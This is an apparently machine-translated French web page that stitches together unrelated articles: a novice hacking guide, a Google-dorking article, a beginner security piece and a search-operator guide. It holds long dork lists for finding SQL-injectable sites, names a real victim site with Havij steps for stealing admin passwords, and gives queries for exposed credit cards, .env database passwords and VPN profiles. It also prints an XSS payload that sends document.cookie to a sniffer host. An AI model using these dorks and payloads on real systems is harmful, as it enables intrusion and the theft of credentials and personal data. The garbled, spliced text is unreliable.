Maison / 10 règles / Nous utilisons des fonctionnalités peu connues de Google pour trouver des éléments cachés. Instructions d'utilisation de jSQL Injection - un outil multifonctionnel pour rechercher et exploiter les injections SQL dans Kali Linux Inurl php cat name payment

Nous utilisons des fonctionnalités peu connues de Google pour trouver des éléments cachés. Instructions d'utilisation de jSQL Injection - un outil multifonctionnel pour rechercher et exploiter les injections SQL dans Kali Linux Inurl php cat name payment

Et donc, maintenant je vais vous expliquer comment pirater quelque chose sans aucune connaissance particulière. Je dirai tout de suite qu'il y a peu d'avantages à cela, mais quand même.
Tout d’abord, vous devez trouver les sites eux-mêmes. Pour ce faire, allez sur google.com et recherchez des abrutis

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl : news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl : select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl : prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl : offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

voici une petite liste. Vous pouvez utiliser le vôtre. Et voilà, nous avons trouvé le site. Par exemple http://www.vestitambov.ru/
Ensuite, téléchargez ce programme

**Contenu caché : pour voir ce contenu caché, votre nombre de publications doit être égal ou supérieur à 3.**

Cliquez sur OK. Ensuite, nous insérons le site victime.
Nous appuyons sur Démarrer. Ensuite, nous attendons les résultats.
Et ainsi, le programme a trouvé une vulnérabilité SQL.

Ensuite, téléchargez Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= collez-y le lien reçu. Je n’expliquerai pas comment utiliser Havij et où le télécharger ; ce n’est pas difficile à trouver. Tous. Vous avez reçu les données dont vous avez besoin - le mot de passe administrateur, et ensuite c'est à votre imagination.

P.S. C'est ma première tentative d'écrire quelque chose. Désolé si quelque chose ne va pas

L'obtention de données privées ne signifie pas toujours un piratage : elles sont parfois publiées publiquement. La connaissance des paramètres de Google et un peu d'ingéniosité vous permettront de trouver beaucoup de choses intéressantes - des numéros de carte de crédit aux documents du FBI.

AVERTISSEMENT Toutes les informations sont fournies à titre informatif uniquement. Ni les éditeurs ni l'auteur ne sont responsables de tout dommage éventuel causé par les éléments de cet article.

Aujourd’hui, tout est connecté à Internet, sans se soucier d’en restreindre l’accès. Ainsi, de nombreuses données privées deviennent la proie des moteurs de recherche. Les robots araignées ne se limitent plus aux pages Web, mais indexent tout le contenu disponible sur Internet et ajoutent constamment des informations non publiques à leurs bases de données. Découvrir ces secrets est facile : il vous suffit de savoir comment poser des questions à leur sujet.

Recherche de fichiers

Entre des mains compétentes, Google trouvera rapidement tout ce qui ne se trouve pas sur Internet, par exemple les informations personnelles et les fichiers à usage officiel. Elles sont souvent cachées comme une clé sous un tapis : il n'y a pas de réelles restrictions d'accès, les données se trouvent simplement au dos du site, là où aucun lien ne mène. L'interface Web standard de Google ne fournit que des paramètres de recherche avancés de base, mais même ceux-ci seront suffisants.

Vous pouvez limiter votre recherche Google à un type spécifique de fichier à l'aide de deux opérateurs : filetype et ext . Le premier précise le format que le moteur de recherche a déterminé à partir du titre du fichier, le second précise l'extension du fichier, quel que soit son contenu interne. Lors de la recherche dans les deux cas, il vous suffit de spécifier l'extension. Initialement, l'opérateur ext était pratique à utiliser dans les cas où le fichier n'avait pas de caractéristiques de format spécifiques (par exemple, pour rechercher des fichiers de configuration ini et cfg, qui pouvaient contenir n'importe quoi). Désormais, les algorithmes de Google ont changé et il n'y a plus de différence visible entre les opérateurs : dans la plupart des cas, les résultats sont les mêmes.


Filtrage des résultats

Par défaut, Google recherche les mots et, en général, les caractères saisis dans tous les fichiers des pages indexées. Vous pouvez limiter la zone de recherche par domaine de premier niveau, par site spécifique ou par l'emplacement de la séquence de recherche dans les fichiers eux-mêmes. Pour les deux premières options, utilisez l'opérateur du site, suivi du nom du domaine ou du site sélectionné. Dans le troisième cas, tout un ensemble d'opérateurs permet de rechercher des informations dans les champs de service et les métadonnées. Par exemple, allinurl trouvera celui indiqué dans le corps des liens eux-mêmes, allinanchor - dans le texte équipé de la balise , allintitle - dans les titres des pages, allintext - dans le corps des pages.

Pour chaque opérateur, il existe une version allégée avec un nom plus court (sans le préfixe all). La différence est que allinurl trouvera des liens avec tous les mots, et inurl ne trouvera que des liens avec le premier d'entre eux. Le deuxième mot et les mots suivants de la requête peuvent apparaître n’importe où sur les pages Web. L'opérateur inurl diffère également d'un autre opérateur ayant une signification similaire - site. Le premier permet également de trouver n'importe quelle séquence de caractères dans un lien vers le document recherché (par exemple, /cgi-bin/), largement utilisé pour rechercher des composants présentant des vulnérabilités connues.

Essayons-le en pratique. Nous prenons le filtre allintext et faisons en sorte que la demande produise une liste de numéros et de codes de vérification de cartes de crédit qui n'expireront que dans deux ans (ou lorsque leurs propriétaires en auront assez de nourrir tout le monde).

Allintext : date d'expiration du numéro de carte / cvv 2017

Lorsque vous lisez dans l'actualité qu'un jeune hacker a « piraté les serveurs » du Pentagone ou de la NASA, volant des informations classifiées, nous parlons dans la plupart des cas d'une technique aussi basique d'utilisation de Google. Supposons que nous soyons intéressés par une liste d’employés de la NASA et leurs coordonnées. Une telle liste est sûrement disponible sous forme électronique. Pour des raisons de commodité ou par souci de surveillance, il peut également figurer sur le site Web de l’organisation lui-même. Il est logique que dans ce cas il n'y ait pas de liens vers celui-ci, puisqu'il est destiné à un usage interne. Quels mots peuvent contenir un tel fichier ? Au minimum - le champ « adresse ». Tester toutes ces hypothèses est facile.


Inurl : nasa.gov, type de fichier : xlsx « adresse »


Nous utilisons la bureaucratie

Des trouvailles comme celle-ci sont une belle touche. Une prise vraiment solide est fournie par une connaissance plus détaillée des opérateurs de Google pour les webmasters, du réseau lui-même et des particularités de la structure de ce qui est recherché. Connaissant les détails, vous pouvez facilement filtrer les résultats et affiner les propriétés des fichiers nécessaires afin d'obtenir des données vraiment précieuses dans le reste. C'est drôle que la bureaucratie vienne ici à la rescousse. Il produit des formulations standards pratiques pour rechercher des informations secrètes divulguées accidentellement sur Internet.

Par exemple, le cachet de déclaration de distribution, exigé par le département américain de la Défense, signifie des restrictions standardisées sur la distribution d'un document. La lettre A désigne les diffusions publiques dans lesquelles il n'y a rien de secret ; B - destiné uniquement à un usage interne, C - strictement confidentiel, et ainsi de suite jusqu'à F. La lettre X ressort séparément, ce qui marque une information particulièrement précieuse représentant un secret d'État du plus haut niveau. Laissez ceux qui sont censés le faire en service rechercher de tels documents, et nous nous limiterons aux fichiers portant la lettre C. Selon la directive DoDI 5230.24, ce marquage est attribué aux documents contenant une description des technologies critiques qui relèvent du contrôle des exportations. . Vous pouvez trouver ces informations soigneusement protégées sur les sites du domaine de premier niveau .mil, attribué à l'armée américaine.

« DÉCLARATION DE DISTRIBUTION C » inurl:navy.mil

Il est très pratique que le domaine .mil ne contienne que des sites du ministère américain de la Défense et de ses organisations sous contrat. Les résultats de recherche avec une restriction de domaine sont exceptionnellement clairs et les titres parlent d'eux-mêmes. Rechercher des secrets russes de cette manière est pratiquement inutile : le chaos règne dans les domaines.ru et.rf, et les noms de nombreux systèmes d'armes sonnent comme botaniques (PP « Kiparis », canons automoteurs « Akatsia ») ou même fabuleux ( TOS "Buratino").


En étudiant attentivement n'importe quel document d'un site du domaine .mil, vous pouvez voir d'autres marqueurs pour affiner votre recherche. Par exemple, une référence aux restrictions à l'exportation « Sec 2751 », qui est également pratique pour rechercher des informations techniques intéressantes. De temps en temps, il est supprimé des sites officiels où il apparaissait autrefois, donc si vous ne parvenez pas à suivre un lien intéressant dans les résultats de recherche, utilisez le cache de Google (opérateur de cache) ou le site Internet Archive.

Grimper dans les nuages

En plus des documents gouvernementaux accidentellement déclassifiés, des liens vers des fichiers personnels de Dropbox et d'autres services de stockage de données créant des liens « privés » vers des données publiées publiquement apparaissent parfois dans le cache de Google. C’est encore pire avec les services alternatifs et faits maison. Par exemple, la requête suivante recherche les données de tous les clients Verizon sur lesquels un serveur FTP est installé et utilisent activement leur routeur.

Allinurl:ftp://verizon.net

Il y a aujourd'hui plus de quarante mille personnes intelligentes, et au printemps 2015, elles étaient bien plus nombreuses. Au lieu de Verizon.net, vous pouvez remplacer le nom de n'importe quel fournisseur bien connu, et plus il est célèbre, plus le piège peut être important. Grâce au serveur FTP intégré, vous pouvez voir les fichiers sur un périphérique de stockage externe connecté au routeur. Il s'agit généralement d'un NAS pour le travail à distance, d'un cloud personnel ou d'une sorte de téléchargement de fichiers peer-to-peer. Tous les contenus de ces médias sont indexés par Google et d'autres moteurs de recherche, vous pouvez donc accéder aux fichiers stockés sur des disques externes via un lien direct.

En regardant les configurations

Avant la migration généralisée vers le cloud, de simples serveurs FTP constituaient un stockage à distance, qui présentait également de nombreuses vulnérabilités. Beaucoup d’entre eux sont toujours d’actualité aujourd’hui. Par exemple, le programme populaire WS_FTP Professional stocke les données de configuration, les comptes d'utilisateurs et les mots de passe dans le fichier ws_ftp.ini. Il est facile à trouver et à lire, car tous les enregistrements sont enregistrés au format texte et les mots de passe sont cryptés avec l'algorithme Triple DES après un brouillage minimal. Dans la plupart des versions, il suffit de supprimer le premier octet.

Il est facile de déchiffrer ces mots de passe à l'aide de l'utilitaire WS_FTP Password Decryptor ou d'un service Web gratuit.

Lorsqu'on parle de piratage d'un site Web arbitraire, cela signifie généralement obtenir un mot de passe à partir des journaux et des sauvegardes des fichiers de configuration des CMS ou des applications de commerce électronique. Si vous connaissez leur structure typique, vous pouvez facilement indiquer les mots-clés. Les lignes comme celles trouvées dans ws_ftp.ini sont extrêmement courantes. Par exemple, dans Drupal et PrestaShop, il y a toujours un identifiant utilisateur (UID) et un mot de passe correspondant (pwd), et toutes les informations sont stockées dans des fichiers avec l'extension .inc. Vous pouvez les rechercher comme suit :

"pwd=" "UID=" ext:inc

Révéler les mots de passe du SGBD

Dans les fichiers de configuration des serveurs SQL, les noms d'utilisateur et les adresses e-mail sont stockés en texte clair et leurs hachages MD5 sont écrits à la place des mots de passe. À proprement parler, il est impossible de les déchiffrer, mais vous pouvez trouver une correspondance parmi les paires hachage-mot de passe connues.

Il existe encore des SGBD qui n'utilisent même pas le hachage de mot de passe. Les fichiers de configuration de chacun d'entre eux peuvent simplement être visualisés dans le navigateur.

Intext : DB_PASSWORD, type de fichier : env

Avec l'avènement des serveurs Windows, la place des fichiers de configuration a été partiellement prise par le registre. Vous pouvez effectuer une recherche dans ses branches exactement de la même manière, en utilisant reg comme type de fichier. Par exemple, comme ceci :

Type de fichier :reg HKEY_CURRENT_USER "Mot de passe"=

N'oublions pas l'évidence

Parfois, il est possible d'accéder à des informations classifiées à l'aide de données ouvertes accidentellement et portées à l'attention de Google. L'option idéale consiste à trouver une liste de mots de passe dans un format commun. Seules les personnes désespérées peuvent stocker les informations de compte dans un fichier texte, un document Word ou une feuille de calcul Excel, mais il y en a toujours suffisamment.

Type de fichier : xls inurl : mot de passe

D’une part, il existe de nombreux moyens pour prévenir de tels incidents. Il est nécessaire de spécifier les droits d'accès adéquats dans htaccess, de patcher le CMS, de ne pas utiliser de scripts gauchers et de boucher les autres trous. Il existe également un fichier avec une liste d'exceptions robots.txt qui interdit aux moteurs de recherche d'indexer les fichiers et répertoires qui y sont spécifiés. D'un autre côté, si la structure du fichier robots.txt sur un serveur diffère de la structure standard, il devient immédiatement clair ce qu'ils essaient de cacher dessus.

La liste des répertoires et fichiers de n'importe quel site est précédée de l'index standard de. Puisqu'à des fins de service, il doit apparaître dans le titre, il est logique de limiter sa recherche à l'opérateur intitle. Des choses intéressantes se trouvent dans les répertoires /admin/, /personal/, /etc/ et même /secret/.

Restez à l'écoute des mises à jour

La pertinence est ici extrêmement importante : les anciennes vulnérabilités sont corrigées très lentement, mais Google et ses résultats de recherche changent constamment. Il y a même une différence entre un filtre « dernière seconde » (&tbs=qdr:s à la fin de l'URL de requête) et un filtre « temps réel » (&tbs=qdr:1).

L'intervalle de temps de la date de la dernière mise à jour du fichier est également indiqué implicitement par Google. Grâce à l'interface Web graphique, vous pouvez sélectionner l'une des périodes standards (heure, jour, semaine, etc.) ou définir une plage de dates, mais cette méthode n'est pas adaptée à l'automatisation.

D'après l'apparence de la barre d'adresse, vous ne pouvez que deviner un moyen de limiter la sortie des résultats à l'aide de la construction &tbs=qdr:. La lettre y après fixe la limite d'un an (&tbs=qdr:y), m montre les résultats du mois dernier, w - pour la semaine, d - pour le jour passé, h - pour la dernière heure, n - pour une minute, et s - pour donne-moi une seconde. Les résultats les plus récents que Google vient de faire connaître se trouvent grâce au filtre &tbs=qdr:1 .

Si vous avez besoin d'écrire un script astucieux, il sera utile de savoir que la plage de dates est définie dans Google au format Julian à l'aide de l'opérateur daterange. Par exemple, voici comment retrouver une liste de documents PDF avec le mot confidentiel, téléchargés du 1er janvier au 1er juillet 2015.

Type de fichier confidentiel : pdf plage de dates : 2457024-2457205

La plage est indiquée au format de date julienne sans tenir compte de la partie fractionnaire. Les traduire manuellement à partir du calendrier grégorien n'est pas pratique. Il est plus facile d'utiliser un convertisseur de date.

Ciblage et filtrage à nouveau

En plus de spécifier des opérateurs supplémentaires dans la requête de recherche, ils peuvent être envoyés directement dans le corps du lien. Par exemple, la spécification filetype:pdf correspond à la construction as_filetype=pdf . Cela permet de demander des éclaircissements. Disons que la sortie des résultats uniquement pour la République du Honduras est spécifiée en ajoutant la construction cr=countryHN à l'URL de recherche, et uniquement pour la ville de Bobruisk - gcs=Bobruisk. Vous pouvez trouver une liste complète dans la section développeur.

Les outils d'automatisation de Google sont conçus pour vous faciliter la vie, mais ils ajoutent souvent des problèmes. Par exemple, la ville de l’utilisateur est déterminée par son adresse IP via WHOIS. Sur la base de ces informations, Google non seulement équilibre la charge entre les serveurs, mais modifie également les résultats de recherche. Selon les régions, pour une même demande, des résultats différents apparaîtront sur la première page, et certains d'entre eux pourront être complètement masqués. Le code à deux lettres après la directive gl=country vous aidera à vous sentir cosmopolite et à rechercher des informations sur n'importe quel pays. Par exemple, le code des Pays-Bas est NL, mais le Vatican et la Corée du Nord n'ont pas leur propre code dans Google.

Souvent, les résultats de recherche finissent par être encombrés même après avoir utilisé plusieurs filtres avancés. Dans ce cas, il est facile de clarifier la demande en y ajoutant plusieurs mots d'exception (un signe moins est placé devant chacun d'eux). Par exemple, les termes banque, noms et tutoriel sont souvent utilisés avec le mot Personnel. Par conséquent, des résultats de recherche plus propres seront affichés non pas par un exemple classique de requête, mais par un exemple raffiné :

Intitre : "Index de /Personnel/" -noms -tutoriel -banque

Un dernier exemple

Un hacker sophistiqué se distingue par le fait qu'il se procure tout seul tout ce dont il a besoin. Par exemple, le VPN est une solution pratique, mais soit coûteuse, soit temporaire et soumise à des restrictions. Souscrire un abonnement pour vous-même coûte trop cher. C'est bien qu'il existe des abonnements de groupe, et avec l'aide de Google, il est facile de faire partie d'un groupe. Pour ce faire, il suffit de rechercher le fichier de configuration Cisco VPN, qui possède une extension PCF assez non standard et un chemin reconnaissable : Program Files\Cisco Systems\VPN Client\Profiles. Une seule demande et vous rejoignez, par exemple, l'équipe conviviale de l'Université de Bonn.

Type de fichier : pcf vpn OR Group

INFO Google trouve des fichiers de configuration avec des mots de passe, mais beaucoup d'entre eux sont écrits sous forme cryptée ou remplacés par des hachages. Si vous voyez des chaînes de longueur fixe, recherchez immédiatement un service de décryptage.

Les mots de passe sont stockés cryptés, mais Maurice Massard a déjà écrit un programme pour les décrypter et le propose gratuitement via thecampusgeeks.com.

Google exécute des centaines de types différents d'attaques et de tests d'intrusion. Il existe de nombreuses options, affectant les programmes populaires, les principaux formats de bases de données, de nombreuses vulnérabilités de PHP, les nuages, etc. En sachant exactement ce que vous recherchez, il sera beaucoup plus facile de trouver les informations dont vous avez besoin (en particulier les informations que vous n'aviez pas l'intention de rendre publiques). Shodan n'est pas le seul à se nourrir d'idées intéressantes, mais chaque base de données de ressources réseau indexées !

J'ai décidé de parler un peu de la sécurité de l'information. L'article sera utile aux programmeurs débutants et à ceux qui viennent tout juste de commencer à se lancer dans le développement Frontend. Quel est le problème?

De nombreux développeurs novices se laissent tellement emporter par l'écriture de code qu'ils oublient complètement la sécurité de leur travail. Et surtout, ils oublient les vulnérabilités telles que les requêtes SQL et XXS. Ils proposent également des mots de passe simples pour leurs panneaux d'administration et sont soumis à la force brute. Quelles sont ces attaques et comment les éviter ?

Injection SQL

L'injection SQL est le type d'attaque le plus courant sur une base de données, effectuée lors d'une requête SQL pour un SGBD spécifique. De nombreuses personnes, et même de grandes entreprises, souffrent de telles attaques. La raison en est une erreur du développeur lors de l'écriture de la base de données et, à proprement parler, des requêtes SQL.

Une attaque par injection SQL est possible en raison d'un traitement incorrect des données d'entrée utilisées dans les requêtes SQL. Si l'attaque d'un pirate informatique réussit, vous risquez de perdre non seulement le contenu des bases de données, mais également les mots de passe et les journaux du panneau d'administration. Et ces données seront largement suffisantes pour reprendre complètement le site ou y apporter des ajustements irréversibles.

L'attaque peut être reproduite avec succès dans des scripts écrits en PHP, ASP, Perl et d'autres langages. Le succès de telles attaques dépend davantage du SGBD utilisé et de la manière dont le script lui-même est implémenté. Il existe de nombreux sites vulnérables aux injections SQL dans le monde. C’est facile à vérifier. Entrez simplement « idiots » - ce sont des requêtes spéciales pour rechercher des sites vulnérables. En voici quelques uns:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Comment les utiliser ? Entrez-les simplement dans un moteur de recherche Google ou Yandex. Le moteur de recherche vous proposera non seulement un site vulnérable, mais également une page sur cette vulnérabilité. Mais nous ne nous arrêterons pas là et ne nous assurerons pas que la page est vraiment vulnérable. Pour ce faire, il suffit de mettre un guillemet simple « ‘ après la valeur « id=1 ». Quelque chose comme ça:

  • inurl:games.php?id=1'

Et le site nous donnera une erreur concernant la requête SQL. De quoi notre hacker a-t-il besoin ensuite ?

Et puis il a besoin de ce lien vers la page d’erreur. Ensuite, le travail sur la vulnérabilité s'effectue dans la plupart des cas dans la distribution "Kali Linux" avec ses utilitaires pour cette partie : introduction du code d'injection et réalisation des opérations nécessaires. Comment cela se passera-t-il, je ne peux pas vous le dire. Mais vous pouvez trouver des informations à ce sujet sur Internet.

Attaque XSS

Ce type d'attaque est réalisé sur les fichiers Cookies. Les utilisateurs, à leur tour, adorent les sauvegarder. Pourquoi pas? Que serait-ce sans eux ? Après tout, grâce aux cookies, nous n’avons pas besoin de saisir cent fois le mot de passe de Vk.com ou Mail.ru. Et rares sont ceux qui les refusent. Mais sur Internet, une règle apparaît souvent pour les hackers : le coefficient de commodité est directement proportionnel au coefficient d’insécurité.

Pour mettre en œuvre une attaque XSS, notre hacker a besoin de connaissances en JavaScript. À première vue, le langage est très simple et inoffensif, car il n’a pas accès aux ressources informatiques. Un pirate informatique ne peut travailler qu’avec JavaScript dans un navigateur, mais cela suffit. Après tout, l'essentiel est de saisir le code dans la page Web.

Je ne parlerai pas en détail du processus d'attaque. Je vais seulement vous expliquer les bases et la signification de la façon dont cela se produit.

Un hacker peut ajouter du code JS à un forum ou un livre d'or :

document.location.href ="http://192.168.1.7/sniff.php?test"

Les scripts nous redirigeront vers la page infectée, où le code sera exécuté : qu'il s'agisse d'un sniffer, d'une sorte de stockage ou d'un exploit, qui volera d'une manière ou d'une autre nos Cookies du cache.

Pourquoi Javascript ? Parce que JavaScript est excellent pour gérer les requêtes Web et a accès aux cookies. Mais si notre script nous amène vers un site, l'utilisateur le remarquera facilement. Ici, le pirate informatique utilise une option plus astucieuse : il entre simplement le code dans l'image.

Img=nouvelle image();

Img.src="http://192.168.1.7/sniff.php?"+document.cookie;

Nous créons simplement une image et lui attribuons notre script comme adresse.

Comment se protéger de tout cela ? C'est très simple : ne cliquez pas sur des liens suspects.

Attaques DoS et DDos

DoS (de l'anglais Denial of Service - déni de service) est une attaque de pirate informatique contre un système informatique dans le but de provoquer sa panne. Il s'agit de la création de conditions dans lesquelles les utilisateurs du système de bonne foi ne peuvent pas accéder aux ressources système fournies (serveurs), ou cet accès est difficile. Une panne du système peut aussi être une étape vers sa prise en charge si, dans une situation d'urgence, le logiciel produit des informations critiques : par exemple une version, une partie du code d'un programme, etc. Mais il s'agit le plus souvent d'une mesure de pression économique : la perte d’un service simple et générateur de revenus. Les factures du fournisseur ou les mesures visant à éviter une attaque touchent considérablement la « cible » dans la poche. Actuellement, les attaques DoS et DDoS sont les plus populaires, car elles permettent à presque tous les systèmes de tomber en panne sans laisser de preuves juridiquement significatives.

Quelle est la différence entre les attaques DoS et DDos ?

DoS est une attaque conçue de manière intelligente. Par exemple, si le serveur ne vérifie pas l'exactitude des paquets entrants, un pirate informatique peut alors faire une demande qui prendra une éternité à traiter et il n'y aura pas assez de temps processeur pour travailler avec d'autres connexions. En conséquence, les clients se verront refuser le service. Mais il ne sera pas possible de surcharger ou de désactiver de cette manière de grands sites connus. Ils sont armés de canaux assez larges et de serveurs super puissants capables de faire face à une telle surcharge sans aucun problème.

Le DDoS est en fait la même attaque que le DoS. Mais si dans DoS il y a un paquet de requêtes, alors dans DDoS il peut y en avoir des centaines ou plus. Même les serveurs les plus puissants ne seront peut-être pas en mesure de faire face à une telle surcharge. Laisse moi te donner un exemple.

Une attaque DoS se produit lorsque vous avez une conversation avec quelqu'un, mais qu'une personne mal élevée arrive et commence à crier fort. Il est soit impossible, soit très difficile de parler. Solution : appeler la sécurité, qui calmera et fera sortir la personne des lieux. Les attaques DDoS se produisent lorsqu’une foule de milliers de personnes aussi mal élevées se précipitent. Dans ce cas, la sécurité ne pourra pas attacher tout le monde et les emmener.

Les DoS et DDoS sont effectués à partir d'ordinateurs, appelés zombies. Il s'agit d'ordinateurs d'utilisateurs piratés par des pirates informatiques qui ne soupçonnent même pas que leur machine participe à une attaque sur un serveur.

Comment s'en protéger ? En général, pas question. Mais vous pouvez rendre les choses plus difficiles pour un pirate informatique. Pour ce faire, vous devez choisir un bon hébergement avec des serveurs puissants.

Attaque de force brute

Un développeur peut proposer de nombreux systèmes de protection contre les attaques, revoir entièrement les scripts que nous avons écrits, vérifier les vulnérabilités du site, etc. Mais lorsqu'il arrive à la dernière étape de la conception du site Web, à savoir lorsqu'il définit simplement un mot de passe pour le panneau d'administration, il risque d'oublier une chose. Mot de passe!

Il est strictement déconseillé de définir un simple mot de passe. Il peut s'agir de 12345, 1114457, vasya111, etc. Il n'est pas recommandé de définir des mots de passe de moins de 10 à 11 caractères. Sinon, vous pourriez être soumis à l'attaque la plus courante et la plus simple : la force brute.

La force brute est une attaque de recherche de mot de passe par dictionnaire utilisant des programmes spéciaux. Les dictionnaires peuvent être différents : latin, énumération par nombres, disons, jusqu'à une certaine plage, mixte (latin + nombres), et il existe même des dictionnaires avec des caractères uniques @#4$%&*~~`'”\ ? etc.

Bien entendu, ce type d’attaque est facile à éviter : il suffit de trouver un mot de passe complexe. Même un captcha peut vous sauver. Aussi, si votre site est réalisé sur un CMS, alors beaucoup d’entre eux détectent ce type d’attaque et bloquent l’IP. Vous devez toujours vous rappeler que plus un mot de passe contient de caractères différents, plus il est difficile à deviner.

Comment fonctionnent les hackers ? Dans la plupart des cas, ils soupçonnent ou connaissent une partie du mot de passe à l’avance. Il est tout à fait logique de supposer que le mot de passe de l’utilisateur ne sera certainement pas composé de 3 ou 5 caractères. De tels mots de passe conduisent à des piratages fréquents. Fondamentalement, les pirates prennent une plage de 5 à 10 caractères et ajoutent plusieurs caractères qu'ils connaissent peut-être à l'avance. Ensuite, les mots de passe avec les plages requises sont générés. La distribution Kali Linux propose même des programmes pour de tels cas. Et voilà, l'attaque ne durera plus longtemps, puisque le volume du dictionnaire n'est plus si important. De plus, un pirate informatique peut utiliser la puissance de la carte vidéo. Certains d'entre eux prennent en charge le système CUDA et la vitesse de recherche est multipliée par 10. Et maintenant, nous voyons qu’une attaque d’une manière aussi simple est bien réelle. Mais les sites Web ne sont pas les seuls à être soumis à la force brute.

Chers développeurs, n'oubliez jamais le système de sécurité de l'information, car aujourd'hui de nombreuses personnes, y compris les États, souffrent de ce type d'attaques. Après tout, la plus grande vulnérabilité est une personne qui peut toujours se laisser distraire quelque part ou rater quelque chose. Nous sommes des programmeurs, mais pas des machines programmées. Soyez toujours sur vos gardes, car la perte d’informations peut avoir de graves conséquences !

Comment rechercher correctement en utilisant google.com

Tout le monde sait probablement comment utiliser un moteur de recherche comme Google =) Mais tout le monde ne sait pas que si vous composez correctement une requête de recherche à l'aide de constructions spéciales, vous pouvez obtenir les résultats de ce que vous recherchez beaucoup plus efficacement et plus rapidement =) Dans cet article Je vais essayer de montrer cela et ce que vous devez faire pour rechercher correctement

Google prend en charge plusieurs opérateurs de recherche avancés qui ont une signification particulière lors d'une recherche sur google.com. En règle générale, ces déclarations modifient la recherche, voire indiquent à Google d'effectuer des types de recherches complètement différents. Par exemple, le link: construct est un opérateur spécial, et la requête lien : www.google.com ne vous fera pas une recherche normale, mais trouvera à la place toutes les pages Web contenant des liens vers google.com.
types de demandes alternatifs

cache : si vous incluez d'autres mots dans une requête, Google mettra en évidence ces mots inclus dans le document mis en cache.
Par exemple, cache : site www.web affichera le contenu mis en cache avec le mot « Web » en surbrillance.

lien : la requête de recherche ci-dessus affichera les pages Web contenant des liens vers la requête spécifiée.
Par exemple: lien : www.site affichera toutes les pages qui ont un lien vers http://www.site

Related : affiche les pages Web « liées » à la page Web spécifiée.
Par exemple, en rapport : www.google.com listera les pages Web similaires à la page d'accueil de Google.

info : Demande d'informations : présentera certaines des informations dont Google dispose sur la page Web que vous demandez.
Par exemple, infos : site internet affichera des informations sur notre forum =) (Armada - Forum des webmasters adultes).

Autres demandes d'informations

Définir : La requête Définir : fournira une définition des mots que vous saisissez après, collectées à partir de diverses sources en ligne. La définition portera sur la phrase entière saisie (c'est-à-dire qu'elle inclura tous les mots de la requête exacte).

actions : si vous démarrez une requête avec des actions : Google traitera le reste des termes de la requête comme des symboles boursiers et créera un lien vers une page affichant des informations prêtes à l'emploi pour ces symboles.
Par exemple, actions : Intel Yahoo affichera des informations sur Intel et Yahoo. (Notez que vous devez saisir les symboles des dernières nouvelles, et non le nom de l'entreprise.)

Modificateurs de requête

site : si vous incluez site : dans votre requête, Google limitera les résultats aux sites Web trouvés dans ce domaine.
Vous pouvez également effectuer une recherche par zones individuelles, telles que ru, org, com, etc. ( site : com site :ru)

allintitle : Si vous exécutez une requête avec allintitle :, Google limitera les résultats à tous les mots de requête dans le titre.
